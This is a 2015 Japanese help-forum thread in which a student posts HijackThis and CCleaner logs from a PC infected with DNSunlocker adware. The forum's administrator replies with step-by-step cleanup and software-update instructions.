悪代官の伏魔殿掲示板
DNSunlockerの感染
つい先日からDNSunlockerに引っかかり、choromeやその他のブラウザでポップアップが表示されるようになったり、クリックすると変なリンク先に繋がるようになる等の症状が起こるようになりました。

感染した理由としては大方の予想がついておりp2pの利用によるものだと思います、今回の件で自分の認識の甘さを認識しており、該当ファイル・クライアントの削除および今後一切の利用を禁ずることを肝に銘じている所存です。

どうかお力添えをお願いします。

以下HJTとCCによるログです。


HJT
---------------------
Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 16:20:19, on 2015/09/06
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16659)

FIREFOX: 35.0.1 (x86 ja)
Boot mode: Normal

Running processes:
C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Program Files (x86)\Janetter2\bin\janettersrv.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Users\【ユーザー名】\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: DOwnnSave - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.dll (file missing)
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [LogMeIn Hamachi Ui] "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O4 - Startup: Dropbox.lnk = 【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CS2\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll
O18 - Protocol: cdl - {3DD53D40-7B8B-11D0-B013-00AA0059CE02} - C:\Windows\SysWOW64\urlmon.dll
O18 - Protocol: dvd - {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\Windows\SysWOW64\msvidctl.dll
O18 - Protocol hijack: file - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B}
O18 - Protocol hijack: ftp - {79EAC9E3-BAF9-11CE-8C82-00AA004BA90B}
O18 - Protocol hijack: http - {79EAC9E2-BAF9-11CE-8C82-00AA004BA90B}
O18 - Protocol: https - {79EAC9E5-BAF9-11CE-8C82-00AA004BA90B} - C:\Windows\SysWOW64\urlmon.dll
O18 - Protocol hijack: its - {9D148291-B9C8-11D0-A4CC-0000F80149F6}
O18 - Protocol: javascript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll
O18 - Protocol: local - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B} - C:\Windows\SysWOW64\urlmon.dll
O18 - Protocol: mailto - {3050F3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll
O18 - Protocol: mhtml - {05300401-BCBC-11D0-85E3-00C04FD85AB4} - C:\Windows\system32\inetcomm.dll
O18 - Protocol hijack: mk - {79EAC9E6-BAF9-11CE-8C82-00AA004BA90B}
O18 - Protocol: ms-its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\Windows\System32\itss.dll
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.dll
O18 - Protocol hijack: res - {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B}
O18 - Protocol hijack: tv - {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E}
O18 - Protocol: vbscript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\Windows\SysWOW64\mshtml.dll
O18 - Protocol: wlmailhtml - {03C514A3-1EFB-4856-9F99-10D7BE1653C0} - C:\Program Files (x86)\Windows Live\Mail\mailcomm.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Chrome リモート デスクトップ サービス (chromoting) - Google Inc. - C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DisplayLinkManager (DisplayLinkService) - DisplayLink Corp. - C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: @C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe,-100 (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - Riverbed Technology, Inc. - C:\Program Files (x86)\WinPcap\rpcapd.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 13265 bytes



cc
-------------------------
7-Zip 9.20 (x64 edition) Igor Pavlov 2014/04/02 4.53 MB 9.20.00.0
Acer Backup Manager NTI Corporation 2012/06/20 337 MB 3.0.0.100
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 2013/08/08 1.04.3507
Acer ScreenSaver Acer Incorporated 2013/08/08 20.11.1107.1418
Acer Updater Acer Incorporated 2012/06/20 1.02.3501
Adobe AIR Adobe Systems Incorporated 2014/04/23 13.0.0.83
Adobe Flash Player 18 ActiveX Adobe Systems Incorporated 2015/08/12 8.30 MB 18.0.0.232
Adobe Flash Player 18 NPAPI Adobe Systems Incorporated 2015/08/12 8.85 MB 18.0.0.232
Adobe Reader X (10.1.13) MUI Adobe Systems Incorporated 2014/12/13 482 MB 10.1.13
Amazon Kindle Amazon 2015/04/06
Apple Application Support(32 ビット) Apple Inc. 2015/04/18 94.2 MB 3.1.3
Apple Application Support(64 ビット) Apple Inc. 2015/04/18 107 MB 3.1.3
Apple Mobile Device Support Apple Inc. 2015/08/24 23.1 MB 8.1.1.3
Apple Software Update Apple Inc. 2014/04/07 2.38 MB 2.1.3.127
Audacity 2.0.6 Audacity Team 2014/10/18 47.2 MB 2.0.6
Bandicam Bandisoft.com 2015/08/18 29.8 MB 2.3.0.834
Bandisoft MPEG-1 Decoder Bandisoft.com 2015/08/18
Battlelog Web Plugins EA Digital Illusions CE AB 2015/02/04 2.6.2
Bonjour Apple Inc. 2014/06/04 2.00 MB 3.0.0.10
Borderlands 2 Gearbox Software 2015/03/06
Broadcom Card Reader Driver Installer Broadcom Corporation 2013/08/08 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 2013/08/08 5.100.82.120
CCleaner Piriform 2015/09/06 5.09
Chrome Remote Desktop Host Google Inc. 2015/09/03 18.0 MB 45.0.2454.17
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 166 MB 6.5.2727_43992
DisplayLink Core Software DisplayLink Corp. 2015/06/22 26.8 MB 7.8.63104.0
DisplayLink Graphics DisplayLink Corp. 2015/06/22 4.48 MB 7.8.63153.0
Dropbox Dropbox, Inc. 2015/09/04 3.8.8
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 2013/08/08 10.6.9.9
Explzh for Windows (64bit) pon software 2014/11/26 7.2.3.0
Fallout 3 - Game of the Year Edition Bethesda Game Studios 2015/06/22
Google Chrome Google Inc. 2015/09/03 45.0.2454.85
Google 日本語入力 Google Inc. 2015/09/03 87.1 MB 2.17.2267.0
Hangame 2015/06/10
Identity Card Acer Incorporated 2013/08/08 1.00.3501
Intel(R) Control Center Intel Corporation 2013/08/09 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 2013/08/09 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation 2013/08/08
Intel(R) Processor Graphics Intel Corporation 2013/08/09 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 2013/08/09 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2013/08/08 10.6 MB 1.23.605.1
iTunes Apple Inc. 2015/08/24 242 MB 12.1.2.27
Jane Style Version 3.83 Jane, Inc. 2015/04/06 3.83
Janetter 4.3.0.2 Jane, Inc. 2014/11/26
Java 8 Update 31 Oracle Corporation 2015/01/24 74.0 MB 8.0.310
Launch Manager Acer Inc. 2013/08/08 5.1.15
League of Legends Riot Games 2015/05/18 3.0.1
Left 4 Dead 2 Valve 2014/06/19
LEGO® Worlds TT Games 2015/06/22
LibraryModule Software Publisher 2014/03/18
LibreOffice 4.3.4.1 The Document Foundation 2014/12/09 469 MB 4.3.4.1
Logicool ゲーム ソフトウェア 8.57 Logicool 2015/04/06 110 MB 8.57.145
LogMeIn Hamachi LogMeIn, Inc. 2015/08/03 2.2.0.383
Microsoft .NET Framework 4.5.1 (日本語) Microsoft Corporation 2014/04/09 2.93 MB 4.5.50938
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/01/29 38.8 MB 4.5.51209
Microsoft Games for Windows - LIVE Redistributable Microsoft Corporation 2015/06/22 32.5 MB 2.0.672.0
Microsoft OneDrive Microsoft Corporation 2015/08/20 36.1 MB 17.3.5930.0814
Microsoft Security Essentials Microsoft Corporation 2015/05/18 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2015/05/18 150 MB 5.1.40416.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/06/20 300 KB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2013/08/08 708 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2013/08/08 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2014/04/08 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2015/03/06 1.41 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2013/08/08 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2014/04/08 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 15.2 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 12.2 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 Microsoft Corporation 2015/06/22 20.5 MB 11.0.61030.0
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 Microsoft Corporation 2015/06/22 17.3 MB 11.0.61030.0
Microsoft XNA Framework Redistributable 4.0 Microsoft Corporation 2014/08/05 8.03 MB 4.0.20823.0
Mozilla Firefox 35.0.1 (x86 ja) Mozilla 2015/02/17 82.9 MB 35.0.1
Mozilla Maintenance Service Mozilla 2015/02/17 214 KB 35.0.1
MyWinLocker Suite Egis Technology Inc. 2012/06/20 2.63 MB 4.0.14.19
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2013/08/08 0.96 GB 9.0.2.9006
Origin Electronic Arts, Inc. 2014/05/11 9.4.7.2799
Portal 2 Valve 2015/01/29
PunkBuster Services Even Balance, Inc. 2015/02/04 0.994
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2013/08/08 6.0.1.6543
RED BELT SKIN Series 2014/10/18
Skype(TM) 7.6 Skype Technologies S.A. 2015/08/07 73.2 MB 7.6.105
Starbound 2015/01/29
Starbound - Unstable 2015/06/22
Steam Valve Corporation 2014/04/23
TeamSpeak 3 Client TeamSpeak Systems GmbH 2015/02/22 3.0.16
Terraria Re-Logic 2014/08/05
The Walking Dead 2015/01/29
The Walking Dead: Season Two Telltale Games 2015/01/29
Unity Web Player Unity Technologies ApS 2014/05/12 12.0 MB
Vivaldi Vivaldi 2015/06/30 1.0.162.9
VLC media player 2.1.3 VideoLAN 2014/05/29 2.1.3
Welcome Center Acer Incorporated 2013/08/08 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
WinPcap 4.1.3 Riverbed Technology, Inc. 2014/04/08 4.1.0.2980
WinRAR 5.01 (64ビット) win.rar GmbH 2014/04/02 5.01.0
World of Warships Wargaming.net 2015/05/01 17.9 MB
XMedia Recode バージョン 3.1.9.0 XMedia Recode 2014/06/21 23.6 MB 3.1.9.0
らくらく無線スタートEX NEC AccessTechnica, Ltd. 2014/07/08
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2013/08/08 13.2 MB 2.5.1.0


  • あすとろ
  • 2015/09/06 (Sun) 16:41:56
返信フォームへ 
2つほど重要な確認を
こんばんは。
ここの管理人の悪代官です。
夜8時45分頃に成敗されるのが嫌なので、日アサ8時45分頃の美少女戦隊にお仕置きされてます。
♪こんなザコは駄目だもん(爆

説明とログを見せてもらいました。

>感染した理由としては大方の予想がついておりp2pの利用によるものだと思います、今回の件で自分の認識の甘さを認識しており、該当ファイル・クライアントの削除および今後一切の利用を禁ずることを肝に銘じている所存です。

はい、正直に打ち明けてくれたことは良いことです。
P2Pを介して感染するマルウェアの危険性は他のマルウェアよりも格段厄介と思ってください。
はっきり言えばP2Pで感染したら、確実な対処はリカバリしかないとさえいえるほどです。

それでも手間を覚悟で作業して解決を目指す意思をお持ちなら自分もできるかぎり協力してもいいです。
往生際が悪いのは悪代官のお約束です(違

ですが相談をお受けする前に重要なことを確認します。

該当のPCには現在マカフィー社のアプリを何か入れていますか?
マカフィーの痕跡が見えてますが、現在のインストール情報ログには出てませんので。

そしてもうひとつ、該当のPCは職場でお仕事に使っていますか?

この2点を説明お願いします。
それを聞いたうえで対処を考えましょう
  • 悪代官
  • 2015/09/06 (Sun) 21:14:26
返信フォームへ 
Re: DNSunlockerの感染
こんばんは。

自分としてはできればリカバリせずに解決したいと思っているので時間をかけてしまうかもしれないのは承知で解決したいと考えています。

質問の答えになりますが購入後にマカフィー社のアプリがインストールされており、よくある無料体験の類かと思ったのですがただの広告(?)のようなもので「あっても容量を圧迫する」と判断したのでアンインストールしていました。

後者に関しては私は学生なので趣味用としてこのPCを使っています。
  • あすとろ
  • 2015/09/06 (Sun) 22:36:51
返信フォームへ 
それでは作業開始です
説明を見せていただきました。
あすとろさんは学生さんでしたか。それなら何とか協力も可能でしょう。

>マカフィー社のアプリがインストールされており、よくある無料体験の類かと思ったのですがただの広告(?)のようなもので「あっても容量を圧迫する」と判断したのでアンインストールしていました。

はい、それなら「マカフィーセキュリティスキャンプラス」みたいですね。
それは検出のみ可能な簡易ツールで、保護機能はない実質セキュリティソフトとしては意味をなさないものです。
どんな低レベルのマルウェアでも感染前にきちんと保護ができていればあっさり防げるものですが、一度入り込まれたら駆除は恐ろしく難しいことも多いのです。

しかも以前にP2Pを使っていたことも打ち明けてくれたので、最悪リカバリ不可避になる可能性はあるので、必要なデータ等は最優先でバックアップしておいてください。

準備ができたら慎重に作業にかかりましょう。

まず最初にお伝えしておきます。
見てのとおり現在相談者さん多数のため、相談受けてから皆さんに順番にレスできるまで、毎回1日かそれ以上かかる可能性もあるので、すみませんがご了承ください。

では以下の説明をよく見てから、順番に作業をお願いします。
既に準備した物もあるはずですが、一応説明を再度見ておいてください。

隠しファイルと拡張子を表示設定にしてください(やり方↓)
http://pasofaq.jp/windows/mycomputer/hiddenfile.htm
http://support.microsoft.com/kb/978449/ja

下記のツールをダウンロードして、基本の使い方を把握しておいてください。
ただし、配布サイトで他のアプリをダウンロードしろと勧めてくるような広告も出てきたらそれらは絶対にクリックしないでください。
「GeekUninstaller」(通称:GU)
説明ページ↓
http://www.gigafree.net/system/install/geekuninstaller.html
ダウンロード↓
http://www.geekuninstaller.com/download
「download free」をクリック、保存後、解凍してください。
片付ける時はフォルダごと手動で削除してください。

「CCleaner」(通称:CC)
説明↓
http://www.gigafree.net/system/clean/ccleaner.html
http://note.chiebukuro.yahoo.co.jp/detail/n178757
ダウンロード↓
http://www.piriform.com/ccleaner/download/standard
最新バージョンをダウンロードしてください。なお、インストール時におまけのアプリも勧めてくることがありますが、それらはチェック外してインストールは避けてください。
片付けるときはアンインストールしてください。

ここで重要な注意です。
CCは本来は高い性能を持つメンテナンスソフトですが、間違った使い方すると
【Windowsにダメージを与えてしまうおそれもある】
ので、ここでは解析ツールとしてのみ使います。
説明をしっかり読んで、自分が指示した以外の操作はしないように。

そして下記ページは作業開始前に必ず熟読して、必要な場合が出たらそれに沿って対処してください。この対処が必要な事例が増えています。
http://note.chiebukuro.yahoo.co.jp/detail/n335704

準備できたら作業開始です。
なお、このあとの作業で探しても見つからないものはスルーして進めていいですが、指示した対象外の物は絶対にいじらないようによく見て作業してください。

また、作業のうえで削除指示するものもあるはずですが、ご自身で必要として入れたものがあればそれの削除は保留して、次のレスでその旨を教えてください。

>Platform: Windows 7 SP1 (WinNT 6.00.3505)
>MSIE: Internet Explorer v9.00 (9.00.8112.16659)
Win7用のIE最新版は現在11です。
Windowsの各種更新(WindowsUpdate)は常に最新に適用しておかないと、それだけで危険な感染はすぐにでも起きますよ。

また、少なくとも下記のアプリは旧バージョンです。
Adobe Reader X (10.1.13) MUI Adobe Systems Incorporated 2014/12/13 482 MB 10.1.13

Java 8 Update 31 Oracle Corporation 2015/01/24 74.0 MB 8.0.310

LibreOffice 4.3.4.1 The Document Foundation 2014/12/09 469 MB 4.3.4.1

Mozilla Firefox 35.0.1 (x86 ja) Mozilla 2015/02/17 82.9 MB 35.0.1

Skype(TM) 7.6 Skype Technologies S.A. 2015/08/07 73.2 MB 7.6.105

VLC media player 2.1.3 VideoLAN 2014/05/29 2.1.3

各種アプリの更新を怠っただけでも、脆弱性を悪用されて深刻な感染はあっさり起きます。
使うなら最新版に更新してください。使わないアプリならアンインストールが安全です。
他にも旧バージョンないか調べて、あれば同様に更新するか、アンインストールしてください。

ここでWindowsの標準機能である「システムの復元」での復元ポイントをひとつ、手動で作成しておいてください。
これはこの後の作業で、間違って対象外のものをいじってしまうとそれだけでWindowsに深刻な不具合を起こすこともあるので、万一の際に復元可能にしておくためです。
http://windows.microsoft.com/ja-jp/windows7/create-a-restore-point

今度はPCをセーフモードで起動してください(やり方↓)
http://www.pc-master.jp/sousa/s-safemode.html

セーフモードでGUを使って、下記をアンインストールしてください。
Amazon Kindle Amazon 2015/04/06

Audacity 2.0.6 Audacity Team 2014/10/18 47.2 MB 2.0.6

Bandicam Bandisoft.com 2015/08/18 29.8 MB 2.3.0.834

Bandisoft MPEG-1 Decoder Bandisoft.com 2015/08/18

WinPcap 4.1.3 Riverbed Technology, Inc. 2014/04/08 4.1.0.2980

WinRAR 5.01 (64ビット) win.rar GmbH 2014/04/02 5.01.0

続いてセーフモードのままでスタートメニューの「アクセサリ」→「システムツール」から「ディスククリーンアップ」を起動してください。
起動したら対象ドライブでCドライブを選択してスキャンして、表示された中の「ダウンロードされたプログラムファイル」「インターネット一時ファイル」「一時ファイル」の項目だけチェックを入れてから「OK」「ファイルの削除」を押してください。
これを実行すると選択した部分のゴミファイルが掃除されます。

